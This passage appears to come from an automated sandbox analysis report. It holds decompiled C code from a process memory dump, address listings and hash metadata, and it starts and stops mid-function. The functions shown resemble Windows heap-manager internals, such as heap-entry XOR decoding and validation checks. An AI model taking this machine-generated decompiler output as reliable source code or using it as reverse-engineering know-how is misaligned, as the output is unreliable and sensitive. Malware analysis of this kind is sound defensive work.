					_t159 = _t158 & (1 << _t139) - 0x00000001;
					_t105 = _v12;
				} else {
					_t105 = E1E3ED340(_t99 * _v24, _t139, _t99 * _v24 >> 0x20);
					_v12 = _t105;
					_t159 = _v32 - _v28 * _t105;
				}
				if(_t159 == 0) {
					_t140 =  *(_t119 + 0x14) & 0x0000ffff;
					if(_t140 >= _t105) {
						_t140 = _t105 & 0x0000ffff;
					}
					 *(_t119 + 0x14) = _t140;
					_t141 = _t105 + _t105;
					_t142 = _t141 & 0x0000001f;
					_t176 = 3;
					_t178 =  !(_t176 << _t142);
					_t108 =  *(_t119 + (_t141 >> 5) * 4 + 0x20);
					do {
						asm("lock cmpxchg [ebx], edx");
					} while ((_t108 & _t178) != 0);
					if((_t108 >> _t142 & 0x00000001) != 0) {
						_t119 = _v16;
						_t172 = 0;
						if( *((char*)(_t119 + 0x1d)) > 1) {
							_t112 = E1E46D864(_t119, _a4 - _t119, _t182 & 0x0000ffff, 0,  &_v32);
							_t184 = _t112;
							if(_t112 != 0xffffffff) {
								asm("lock xadd [ecx], edx");
								E1E46D8DF(_v20, _t119, _t184, 2, _a8);
							}
						}
						goto L14;
					}
					_push(_t142);
					_push(_v12);
					E1E46A80D( *_v20, "true", _a4, _v16);
					_t172 = 0;
				}
			}








































                                        0x1e46dbdc
                                        0x1e46dbde
                                        0x1e46dbe1
                                        0x1e46dbed
                                        0x1e46dbef
                                        0x1e46dbf7
                                        0x1e46dbfd
                                        0x1e46dc00
                                        0x1e46dc04
                                        0x1e46dc07
                                        0x1e46dc0c
                                        0x1e46dd1f
                                        0x1e46dd1f
                                        0x1e46dd23
                                        0x1e46dd26
                                        0x1e46dd29
                                        0x1e46dd2c
                                        0x1e46dd32
                                        0x1e46dd35
                                        0x00000000
                                        0x1e46dd38
                                        0x1e46dd3a
                                        0x1e46dd5d
                                        0x1e46dd63
                                        0x1e46dd69
                                        0x1e46dd6e
                                        0x1e46dd71
                                        0x1e46dd78
                                        0x1e46dd7d
                                        0x1e46dd8c
                                        0x1e46dd9e
                                        0x1e46dda0
                                        0x1e46ddad
                                        0x1e46ddb0
                                        0x1e46ddb5
                                        0x1e46ddb9
                                        0x1e46ddd9
                                        0x1e46ddd9
                                        0x1e46ddde
                                        0x1e46dde0
                                        0x1e46dde3
                                        0x1e46dde5
                                        0x1e46dde9
                                        0x1e46dde9
                                        0x1e46ddee
                                        0x1e46ddf6
                                        0x1e46ddf6
                                        0x1e46dd97
                                        0x00000000
                                        0x00000000
                                        0x1e46dd9b
                                        0x00000000
                                        0x1e46dd9b
                                        0x1e46dd7f
                                        0x00000000
                                        0x1e46dd7f
                                        0x1e46dd3f
                                        0x1e46dd54
                                        0x1e46dd58
                                        0x1e46dd86
                                        0x00000000
                                        0x1e46dd86
                                        0x00000000
                                        0x1e46dd5a
                                        0x1e46dd5a
                                        0x1e46dd5a
                                        0x00000000
                                        0x1e46dd5a
                                        0x1e46dd3f
                                        0x1e46dd38
                                        0x1e46dc12
                                        0x1e46dc15
                                        0x1e46dc25
                                        0x1e46dc31
                                        0x1e46dc34
                                        0x1e46dc3b
                                        0x1e46dc3e
                                        0x1e46dc40
                                        0x1e46dc43
                                        0x1e46dc46
                                        0x1e46dc62
                                        0x1e46dc6b
                                        0x1e46dc6d
                                        0x1e46dc48
                                        0x1e46dc4b
                                        0x1e46dc59
                                        0x1e46dc5c
                                        0x1e46dc5c
                                        0x1e46dc72
                                        0x1e46dc78
                                        0x1e46dc7f
                                        0x1e46dc81
                                        0x1e46dc81
                                        0x1e46dc84
                                        0x1e46dc88
                                        0x1e46dc8d
                                        0x1e46dc95
                                        0x1e46dc9b
                                        0x1e46dca0
                                        0x1e46dca2
                                        0x1e46dca6
                                        0x1e46dca6
                                        0x1e46dcb0
                                        0x1e46dcd1
                                        0x1e46dcd4
                                        0x1e46dcda
                                        0x1e46dcec
                                        0x1e46dcf1
                                        0x1e46dcf6
                                        0x1e46dd0c
                                        0x1e46dd1a
                                        0x1e46dd1a
                                        0x1e46dcf6
                                        0x00000000
                                        0x1e46dcda
                                        0x1e46dcb5
                                        0x1e46dcb6
                                        0x1e46dcc5
                                        0x1e46dcca
                                        0x1e46dcca

                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 42c95ea19a0d12242c765fa67216cf44f23c5ad245df3ed0761039b56f4a7f77
                                        • Instruction ID: de7bd1c725eff31b130e7ef5654920bd70037667132363453884c0dfba872d46
                                        • Opcode Fuzzy Hash: 42c95ea19a0d12242c765fa67216cf44f23c5ad245df3ed0761039b56f4a7f77
                                        • Instruction Fuzzy Hash: A771A875E001695FCB04EF59C8909BEB7F6EF8C310B11426AE895EB345D734D986CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E461002, Relevance: .2, Instructions: 198COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E1E461002(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _t75;
				intOrPtr* _t76;
				signed int _t77;
				signed short _t78;
				signed short _t80;
				signed int _t81;
				signed short _t82;
				signed short _t83;
				signed short _t85;
				signed int _t86;
				void* _t90;
				signed short _t91;
				signed int _t95;
				signed short _t97;
				signed short _t99;
				intOrPtr* _t101;
				signed short _t102;
				signed int _t103;
				signed short _t105;
				intOrPtr _t106;
				signed int* _t108;
				signed short _t109;
				signed short _t111;
				signed short _t112;
				signed int _t113;
				signed short _t117;
				signed int _t120;
				void* _t121;
				signed int _t122;
				signed int _t126;
				signed int* _t127;
				signed short _t128;
				intOrPtr _t129;
				intOrPtr _t130;
				signed int _t132;
				signed int _t133;

				_t121 = __edx;
				_t130 = __ecx;
				_v16 = __ecx;
				_t108 = __ecx + 0xa4;
				_t75 =  *_t108;
				L4:
				L4:
				if(_t75 != _t108) {
					goto L1;
				} else {
					_t127 = _t130 + 0x9c;
					_t120 =  *_t127;
				}
				while(_t120 != _t127) {
					_t132 = _t120 & 0xffff0000;
					__eflags = _t132 - _t121;
					if(_t132 <= _t121) {
						_t75 =  *((intOrPtr*)(_t120 + 0x14)) + _t132;
						__eflags = _t75 - _t121;
						if(_t75 > _t121) {
							 *0x1e495898 = 5;
						}
					}
					_t120 =  *_t120;
				}
				L68:
				return _t75;
				L1:
				_t3 = _t75 - 0x10; // -16
				_t126 = _t3;
				_v20 = _t126;
				__eflags =  *((intOrPtr*)(_t126 + 0x1c)) - _t121;
				if( *((intOrPtr*)(_t126 + 0x1c)) > _t121) {
					L3:
					_t75 =  *_t75;
					goto L4;
				}
				__eflags =  *((intOrPtr*)(_t126 + 0x28)) - _t121;
				if( *((intOrPtr*)(_t126 + 0x28)) > _t121) {
					_t8 = _t126 + 0x38; // 0x28
					_t101 = _t8;
					_t109 = 0;
					_v8 = _v8 & 0;
					_t76 =  *_t101;
					_v12 = _t101;
					__eflags = _t76 - _t101;
					if(_t76 == _t101) {
						L17:
						_t102 = 0;
						_v20 = 0;
						__eflags = _t109;
						if(_t109 == 0) {
							_t109 = _t126;
						}
						_t128 = 0;
						__eflags = _t109 - _t121;
						if(_t109 >= _t121) {
							L29:
							_t111 = _v8 + 0xfffffff8;
							__eflags = _t111 - _t121;
							if(_t111 <= _t121) {
								L33:
								 *0x1e4958b0 = _t128;
								 *0x1e4958b4 = _t102;
								__eflags = _t128;
								if(_t128 == 0) {
									L42:
									__eflags =  *(_t130 + 0x4c);
									if( *(_t130 + 0x4c) == 0) {
										_t77 =  *_t128 & 0x0000ffff;
										_t112 = 0;
										__eflags = 0;
									} else {
										_t85 =  *_t128;
										_t112 =  *(_t130 + 0x4c);
										__eflags = _t85 & _t112;
										if((_t85 & _t112) != 0) {
											_t85 = _t85 ^  *(_t130 + 0x50);
											__eflags = _t85;
										}
										_t77 = _t85 & 0x0000ffff;
									}
									_v8 = _t77;
									__eflags = _t102;
									if(_t102 != 0) {
										_t117 =  *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff;
										__eflags = _t117;
										 *0x1e4958b8 = _t117;
										_t112 =  *(_t130 + 0x4c);
									}
									__eflags = _t112;
									if(_t112 == 0) {
										_t78 =  *_t128 & 0x0000ffff;
									} else {
										_t83 =  *_t128;
										__eflags =  *(_t130 + 0x4c) & _t83;
										if(( *(_t130 + 0x4c) & _t83) != 0) {
											_t83 = _t83 ^  *(_t130 + 0x50);
											__eflags = _t83;
										}
										_t78 = _t83 & 0x0000ffff;
									}
									_t122 = _t78 & 0x0000ffff;
									 *0x1e4958bc = _t122;
									__eflags =  *(_t130 + 0x4c);
									_t113 = _v8 & 0x0000ffff;
									if( *(_t130 + 0x4c) == 0) {
										_t80 =  *(_t128 + _t113 * 8) & 0x0000ffff;
									} else {
										_t82 =  *(_t128 + _t113 * 8);
										__eflags =  *(_t130 + 0x4c) & _t82;
										if(( *(_t130 + 0x4c) & _t82) != 0) {
											_t82 = _t82 ^  *(_t130 + 0x50);
											__eflags = _t82;
										}
										_t122 =  *0x1e4958bc; // 0x0
										_t80 = _t82 & 0x0000ffff;
									}
									_t81 = _t80 & 0x0000ffff;
									__eflags =  *0x1e4958b8 - _t81; // 0x0
									if(__eflags == 0) {
										_t75 =  *(_t130 + 0x54) & 0x0000ffff;
										__eflags = _t122 - ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75);
										if(_t122 == ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75)) {
											goto L68;
										}
										 *0x1e495898 = 7;
										return _t75;
									} else {
										 *0x1e495898 = 6;
										return _t81;
									}
								}
								__eflags = _t102;
								if(_t102 == 0) {
									goto L42;
								}
								__eflags =  *(_t130 + 0x4c);
								if( *(_t130 + 0x4c) == 0) {
									_t86 =  *_t128 & 0x0000ffff;
								} else {
									_t91 =  *_t128;
									__eflags =  *(_t130 + 0x4c) & _t91;
									if(( *(_t130 + 0x4c) & _t91) != 0) {
										_t91 = _t91 ^  *(_t130 + 0x50);
										__eflags = _t91;
									}
									_t86 = _t91 & 0x0000ffff;
								}
								_v8 = _t86;
								_t90 = _t128 + (_v8 & 0x0000ffff) * 8;
								__eflags = _t90 - _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3);
								if(_t90 == _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3)) {
									goto L42;
								} else {
									 *0x1e495898 = 4;
									return _t90;
								}
							}
							_v20 =  *(_t130 + 0x54) & 0x0000ffff;
							while(1) {
								_t102 = _t111;
								_t95 = ( *(_t111 + 4) ^ _v20) & 0x0000ffff;
								__eflags = _t95;
								if(_t95 == 0) {
									goto L33;
								}
								_t111 = _t111 + _t95 * 0xfffffff8;
								__eflags = _t111 - _t121;
								if(_t111 > _t121) {
									continue;
								}
								goto L33;
							}
							goto L33;
						} else {
							_t103 =  *(_t130 + 0x4c);
							while(1) {
								_t128 = _t109;
								__eflags = _t103;
								if(_t103 == 0) {
									_t97 =  *_t109 & 0x0000ffff;
								} else {
									_t99 =  *_t109;
									_t103 =  *(_t130 + 0x4c);
									__eflags = _t99 & _t103;
									if((_t99 & _t103) != 0) {
										_t99 = _t99 ^  *(_t130 + 0x50);
										__eflags = _t99;
									}
									_t97 = _t99 & 0x0000ffff;
								}
								__eflags = _t97;
								if(_t97 == 0) {
									break;
								}
								_t109 = _t109 + (_t97 & 0x0000ffff) * 8;
								__eflags = _t109 - _t121;
								if(_t109 < _t121) {
									continue;
								}
								break;
							}
							_t102 = _v20;
							goto L29;
						}
					}
					_t133 = _v8;
					do {
						_t105 =  *((intOrPtr*)(_t76 + 0xc)) +  *((intOrPtr*)(_t76 + 8));
						_t129 = _v12;
						__eflags = _t105 - _t121;
						if(_t105 < _t121) {
							__eflags = _t105 - _t109;
							if(_t105 > _t109) {
								_t109 = _t105;
							}
						}
						_t106 =  *((intOrPtr*)(_t76 + 8));
						__eflags = _t106 - _t121;
						if(_t106 > _t121) {
							__eflags = _t133;
							if(_t133 == 0) {
								L14:
								_t18 = _t76 - 8; // -8
								_t133 = _t18;
								goto L15;
							}
							__eflags = _t106 -  *((intOrPtr*)(_t133 + 0x10));
							if(_t106 >=  *((intOrPtr*)(_t133 + 0x10))) {
								goto L15;
							}
							goto L14;
						}
						L15:
						_t76 =  *_t76;
						__eflags = _t76 - _t129;
					} while (_t76 != _t129);
					_t126 = _v20;
					_v8 = _t133;
					_t130 = _v16;
					goto L17;
				}
				goto L3;
			}











































                                        0x1e461002
                                        0x1e46100c
                                        0x1e46100f
                                        0x1e461012
                                        0x1e461018
                                        0x00000000
                                        0x1e46102e
                                        0x1e461030
                                        0x00000000
                                        0x1e461032
                                        0x1e461032
                                        0x1e461038
                                        0x1e461038
                                        0x1e46121e
                                        0x1e4611ff
                                        0x1e461205
                                        0x1e461207
                                        0x1e46120c
                                        0x1e46120e
                                        0x1e461210
                                        0x1e461212
                                        0x1e461212
                                        0x1e461210
                                        0x1e46121c
                                        0x1e46121c
                                        0x1e461228
                                        0x1e461228
                                        0x1e46101c
                                        0x1e46101c
                                        0x1e46101c
                                        0x1e46101f
                                        0x1e461022
                                        0x1e461025
                                        0x1e46102c
                                        0x1e46102c
                                        0x00000000
                                        0x1e46102c
                                        0x1e461027
                                        0x1e46102a
                                        0x1e46103f
                                        0x1e46103f
                                        0x1e461042
                                        0x1e461044
                                        0x1e461047
                                        0x1e461049
                                        0x1e46104c
                                        0x1e46104e
                                        0x1e461088
                                        0x1e461088
                                        0x1e46108a
                                        0x1e46108d
                                        0x1e46108f
                                        0x1e461091
                                        0x1e461091
                                        0x1e461093
                                        0x1e461095
                                        0x1e461097
                                        0x1e4610c8
                                        0x1e4610cb
                                        0x1e4610ce
                                        0x1e4610d0
                                        0x1e4610f4
                                        0x1e4610f4
                                        0x1e4610fa
                                        0x1e461100
                                        0x1e461102
                                        0x1e461150
                                        0x1e461150
                                        0x1e461154
                                        0x1e461167
                                        0x1e46116a
                                        0x1e46116a
                                        0x1e461156
                                        0x1e461156
                                        0x1e461158
                                        0x1e46115b
                                        0x1e46115d
                                        0x1e46115f
                                        0x1e46115f
                                        0x1e46115f
                                        0x1e461162
                                        0x1e461162
                                        0x1e46116c
                                        0x1e46116f
                                        0x1e461171
                                        0x1e46117b
                                        0x1e46117b
                                        0x1e46117d
                                        0x1e461183
                                        0x1e461183
                                        0x1e461186
                                        0x1e461188
                                        0x1e461199
                                        0x1e46118a
                                        0x1e46118a
                                        0x1e46118c
                                        0x1e46118f
                                        0x1e461191
                                        0x1e461191
                                        0x1e461191
                                        0x1e461194
                                        0x1e461194
                                        0x1e46119c
                                        0x1e4611a2
                                        0x1e4611a8
                                        0x1e4611ac
                                        0x1e4611af
                                        0x1e4611c7
                                        0x1e4611b1
                                        0x1e4611b1
                                        0x1e4611b4
                                        0x1e4611b7
                                        0x1e4611b9
                                        0x1e4611b9
                                        0x1e4611b9
                                        0x1e4611bc
                                        0x1e4611c2
                                        0x1e4611c2
                                        0x1e4611cb
                                        0x1e4611ce
                                        0x1e4611d4
                                        0x1e4611e7
                                        0x1e4611ed
                                        0x1e4611ef
                                        0x00000000
                                        0x00000000
                                        0x1e4611f1
                                        0x00000000
                                        0x1e4611d6
                                        0x1e4611d6
                                        0x00000000
                                        0x1e4611d6
                                        0x1e4611d4
                                        0x1e461104
                                        0x1e461106
                                        0x00000000
                                        0x00000000
                                        0x1e461108
                                        0x1e46110c
                                        0x1e46111d
                                        0x1e46110e
                                        0x1e46110e
                                        0x1e461110
                                        0x1e461113
                                        0x1e461115
                                        0x1e461115
                                        0x1e461115
                                        0x1e461118
                                        0x1e461118
                                        0x1e461126
                                        0x1e46113a
                                        0x1e46113d
                                        0x1e46113f
                                        0x00000000
                                        0x1e461141
                                        0x1e461141
                                        0x00000000
                                        0x1e461141
                                        0x1e46113f
                                        0x1e4610d6
                                        0x1e4610d9
                                        0x1e4610dd
                                        0x1e4610e3
                                        0x1e4610e6
                                        0x1e4610e9
                                        0x00000000
                                        0x00000000
                                        0x1e4610ee
                                        0x1e4610f0
                                        0x1e4610f2
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e4610f2
                                        0x00000000
                                        0x1e461099
                                        0x1e461099
                                        0x1e46109c
                                        0x1e46109c
                                        0x1e46109e
                                        0x1e4610a0
                                        0x1e4610b3
                                        0x1e4610a2
                                        0x1e4610a2
                                        0x1e4610a4
                                        0x1e4610a7
                                        0x1e4610a9
                                        0x1e4610ab
                                        0x1e4610ab
                                        0x1e4610ab
                                        0x1e4610ae
                                        0x1e4610ae
                                        0x1e4610b6
                                        0x1e4610b9
                                        0x00000000
                                        0x00000000
                                        0x1e4610be
                                        0x1e4610c1
                                        0x1e4610c3
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e4610c3
                                        0x1e4610c5
                                        0x00000000
                                        0x1e4610c5
                                        0x1e461097
                                        0x1e461050
                                        0x1e461053
                                        0x1e461056
                                        0x1e461059
                                        0x1e46105c
                                        0x1e46105e
                                        0x1e461060
                                        0x1e461062
                                        0x1e461064
                                        0x1e461064
                                        0x1e461062
                                        0x1e461066
                                        0x1e461069
                                        0x1e46106b
                                        0x1e46106d
                                        0x1e46106f
                                        0x1e461076
                                        0x1e461076
                                        0x1e461076
                                        0x00000000
                                        0x1e461076
                                        0x1e461071
                                        0x1e461074
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e461074
                                        0x1e461079
                                        0x1e461079
                                        0x1e46107b
                                        0x1e46107b
                                        0x1e46107f
                                        0x1e461082
                                        0x1e461085
                                        0x00000000
                                        0x1e461085
                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d46e3f13d84df42ceb08b36fabe2cc6a014385cb28faf3b70c402f637ba721c2
                                        • Instruction ID: ea071a5036fc68939154c9578114b325cb73a282f3fa86f96ecccd2a53f15d61
                                        • Opcode Fuzzy Hash: d46e3f13d84df42ceb08b36fabe2cc6a014385cb28faf3b70c402f637ba721c2
                                        • Instruction Fuzzy Hash: A8716A74A00662CBCF18CF66D49067AB3F2FB4C301B614A6FD98A97740D779E951CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E472B28, Relevance: .1, Instructions: 129COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 92%
                                        			E1E472B28(signed int __ecx, signed int __edx, signed int _a4, signed int _a8, intOrPtr* _a12) {
				char _v5;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				signed int _t30;
				signed int _t35;
				unsigned int _t50;
				signed int _t52;
				signed int _t53;
				unsigned int _t58;
				signed int _t61;
				signed int _t63;
				signed int _t67;
				signed int _t69;
				intOrPtr _t75;
				signed int _t81;
				signed int _t87;
				void* _t88;
				signed int _t90;
				signed int _t93;

				_t69 = __ecx;
				_t30 = _a4;
				_t90 = __edx;
				_t81 = __ecx;
				_v12 = __ecx;
				_t87 = _t30 - 8;
				if(( *(__ecx + 0x38) & 0x00000001) != 0 && (_t30 & 0x00000fff) == 0) {
					_t87 = _t87 - 8;
				}
				_t67 = 0;
				if(_t90 != 0) {
					L14:
					if((0x0000abed ^  *(_t90 + 0x16)) ==  *((intOrPtr*)(_t90 + 0x14))) {
						_t75 = (( *_t87 ^  *0x1e496110 ^ _t87) >> 0x00000001 & 0x00007fff) * 8 - 8;
						 *_a12 = _t75;
						_t35 = _a8 & 0x00000001;
						_v16 = _t35;
						if(_t35 == 0) {
							E1E3C2280(_t35, _t81);
							_t81 = _v12;
						}
						_v5 = 0xff;
						if(( *_t87 ^  *0x1e496110 ^ _t87) < 0) {
							_t91 = _v12;
							_t88 = E1E47241A(_v12, _t90, _t87, _a8,  &_v5);
							if(_v16 == _t67) {
								E1E3BFFB0(_t67, _t88, _t91);
							}
							if(_t88 != 0) {
								E1E473209(_t91, _t88, _a8);
							}
							_t67 = 1;
						} else {
							_push(_t75);
							_push(_t67);
							E1E46A80D( *((intOrPtr*)(_t81 + 0x20)), 8, _a4, _t87);
							if(_v16 == _t67) {
								E1E3BFFB0(_t67, _t87, _v12);
							}
						}
					} else {
						_push(_t69);
						_push(_t67);
						E1E46A80D( *((intOrPtr*)(_t81 + 0x20)), 0x12, _t90, _t67);
					}
					return _t67;
				}
				_t69 =  *0x1e496110; // 0xc15d2e02
				_t93 = _t87;
				_t50 = _t69 ^ _t87 ^  *_t87;
				if(_t50 >= 0) {
					_t52 = _t50 >> 0x00000010 & 0x00007fff;
					if(_t52 == 0) {
						L12:
						_t53 = _t67;
						L13:
						_t90 = _t93 - (_t53 << 0x0000000c) & 0xfffff000;
						goto L14;
					}
					_t93 = _t87 - (_t52 << 3);
					_t58 =  *_t93 ^ _t69 ^ _t93;
					if(_t58 < 0) {
						L10:
						_t61 =  *(_t93 + 4) ^ _t69 ^ _t93;
						L11:
						_t53 = _t61 & 0x000000ff;
						goto L13;
					}
					_t63 = _t58 >> 0x00000010 & 0x00007fff;
					if(_t63 == 0) {
						goto L12;
					}
					_t93 = _t93 + _t63 * 0xfffffff8;
					goto L10;
				}
				_t61 =  *(_t87 + 4) ^ _t69 ^ _t87;
				goto L11;
			}
























                                        0x1e472b28
                                        0x1e472b30
                                        0x1e472b35
                                        0x1e472b37
                                        0x1e472b3a
                                        0x1e472b3d
                                        0x1e472b44
                                        0x1e472b4d
                                        0x1e472b4d
                                        0x1e472b50
                                        0x1e472b54
                                        0x1e472bb0
                                        0x1e472bbd
                                        0x1e472be8
                                        0x1e472bef
                                        0x1e472bf4
                                        0x1e472bf7
                                        0x1e472bfa
                                        0x1e472bfd
                                        0x1e472c02
                                        0x1e472c02
                                        0x1e472c0f
                                        0x1e472c13
                                        0x1e472c3b
                                        0x1e472c4a
                                        0x1e472c4f
                                        0x1e472c52
                                        0x1e472c52
                                        0x1e472c59
                                        0x1e472c62
                                        0x1e472c62
                                        0x1e472c69
                                        0x1e472c15
                                        0x1e472c18
                                        0x1e472c19
                                        0x1e472c21
                                        0x1e472c29
                                        0x1e472c2f
                                        0x1e472c2f
                                        0x1e472c29
                                        0x1e472bbf
                                        0x1e472bc2
                                        0x1e472bc3
                                        0x1e472bc9
                                        0x1e472bc9
                                        0x1e472c72
                                        0x1e472c72
                                        0x1e472b56
                                        0x1e472b5c
                                        0x1e472b62
                                        0x1e472b64
                                        0x1e472b72
                                        0x1e472b77
                                        0x1e472ba3
                                        0x1e472ba3
                                        0x1e472ba5
                                        0x1e472baa
                                        0x00000000
                                        0x1e472baa
                                        0x1e472b7e
                                        0x1e472b84
                                        0x1e472b86
                                        0x1e472b97
                                        0x1e472b9c
                                        0x1e472b9e
                                        0x1e472b9e
                                        0x00000000
                                        0x1e472b9e
                                        0x1e472b8b
                                        0x1e472b90
                                        0x00000000
                                        0x00000000
                                        0x1e472b95
                                        0x00000000
                                        0x1e472b95
                                        0x1e472b6b
                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7426f7c0ba6ebd951e42982b29c3598c81441f31d984211bd1d2d57c86c341d3
                                        • Instruction ID: 44a23216b840eba1021ab447d87e9db57f719fc0c02e50cc14421d5633b9e6e7
                                        • Opcode Fuzzy Hash: 7426f7c0ba6ebd951e42982b29c3598c81441f31d984211bd1d2d57c86c341d3
                                        • Instruction Fuzzy Hash: CE410BB3E105156FC314CF29C8819EAB7A9EF48A10B018B6EE855D7381D774EE06CBD4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E4722AE, Relevance: .1, Instructions: 116COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E1E4722AE(unsigned int* __ecx, intOrPtr __edx, void* __eflags, signed int _a4, signed int _a8, char* _a12) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t50;
				signed int _t53;
				signed char _t63;
				signed char _t71;
				signed char _t75;
				signed int _t77;
				unsigned int _t106;
				unsigned int* _t114;
				signed int _t117;

				_v20 = _v20 & 0x00000000;
				_t117 = _a4;
				_t114 = __ecx;
				_v24 = __edx;
				E1E4721E8(_t117, __edx,  &_v16,  &_v12);
				if(_v24 != 0 && (_v12 | _v8) != 0) {
					_t71 =  !_v8;
					_v16 =  !_v12 >> 8 >> 8;
					_t72 = _t71 >> 8;
					_t50 = _v16;
					_t20 = (_t50 >> 8) + 0x1e38ac00; // 0x6070708
					_t75 = ( *((intOrPtr*)((_t71 >> 8 >> 8 >> 8) + 0x1e38ac00)) +  *((intOrPtr*)((_t71 >> 0x00000008 >> 0x00000008 & 0x000000ff) + 0x1e38ac00)) +  *((intOrPtr*)((_t71 & 0x000000ff) + 0x1e38ac00)) +  *((intOrPtr*)((_t72 & 0x000000ff) + 0x1e38ac00)) & 0x000000ff) + ( *_t20 +  *((intOrPtr*)((_t50 & 0x000000ff) + 0x1e38ac00)) +  *((intOrPtr*)((_t71 & 0x000000ff) + 0x1e38ac00)) +  *((intOrPtr*)((_t72 & 0x000000ff) + 0x1e38ac00)) & 0x000000ff);
					_v16 = _t75;
					if(( *(__ecx + 0x38) & 0x00000002) != 0) {
						L6:
						_t53 =  *0x1e496110; // 0xc15d2e02
						 *_t117 = ( !_t53 ^  *_t117 ^ _t117) & 0x7fffffff ^  !_t53 ^ _t117;
						 *(_t117 + 4) = (_t117 - _v24 >> 0x0000000c ^  *0x1e496110 ^ _t117) & 0x000000ff | 0x00000200;
						_t77 = _a8 & 0x00000001;
						if(_t77 == 0) {
							E1E3BFFB0(_t77, _t114, _t114);
						}
						_t63 = E1E472FBD(_t114, _v24, _v12, _v8, _v16, 0);
						_v36 = 1;
						if(_t77 == 0) {
							E1E3C2280(_t63, _t114);
						}
						 *(_t117 + 4) =  *(_t117 + 4) & 0xfffffdff;
						 *_a12 = 0xff;
					} else {
						_t106 =  *(__ecx + 0x18) >> 7;
						if(_t106 <= 8) {
							_t106 = 8;
						}
						if( *((intOrPtr*)(_t114 + 0x1c)) + _t75 > _t106) {
							goto L6;
						}
					}
				}
				return _v20;
			}




















                                        0x1e4722b9
                                        0x1e4722c2
                                        0x1e4722c6
                                        0x1e4722c8
                                        0x1e4722d8
                                        0x1e4722e2
                                        0x1e472303
                                        0x1e472314
                                        0x1e472321
                                        0x1e47234a
                                        0x1e47235b
                                        0x1e47236c
                                        0x1e472372
                                        0x1e472376
                                        0x1e47238f
                                        0x1e47238f
                                        0x1e4723b4
                                        0x1e4723c6
                                        0x1e4723c9
                                        0x1e4723cc
                                        0x1e4723cf
                                        0x1e4723cf
                                        0x1e4723e9
                                        0x1e4723ee
                                        0x1e4723f8
                                        0x1e4723fb
                                        0x1e4723fb
                                        0x1e472403
                                        0x1e47240a
                                        0x1e472378
                                        0x1e47237b
                                        0x1e472381
                                        0x1e472385
                                        0x1e472385
                                        0x1e47238d
                                        0x00000000
                                        0x00000000
                                        0x1e47238d
                                        0x1e472376
                                        0x1e472417

                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e885e77d02696f62d01261c79eb35b873ddf0e0bce1c0fb53b490fd9751d56f2
                                        • Instruction ID: ad9b03e02d4ce8881876fabb58f8f7246c089924273f0ebe406c573eadae0999
                                        • Opcode Fuzzy Hash: e885e77d02696f62d01261c79eb35b873ddf0e0bce1c0fb53b490fd9751d56f2
                                        • Instruction Fuzzy Hash: 7041E6715043428BC308CF25C8A19BABBE1EF85625F014B5EF4D19B282CF34D44AD7A5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E4720A8, Relevance: .1, Instructions: 114COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 94%
                                        			E1E4720A8(intOrPtr __ecx, intOrPtr __edx, signed int _a4, signed int* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _t35;
				signed int _t57;
				unsigned int _t61;
				signed int _t63;
				signed int _t64;
				signed int _t73;
				signed int _t77;
				signed int _t80;
				signed int _t83;
				signed int _t84;
				unsigned int _t92;
				unsigned int _t97;
				signed int _t100;
				unsigned int _t102;

				_t79 = __edx;
				_t35 =  *0x1e496110; // 0xc15d2e02
				_t57 = _a4;
				_v8 = __ecx;
				_t84 =  *_t57;
				_v12 = __edx;
				_t61 = _t84 ^ _t35 ^ _t57;
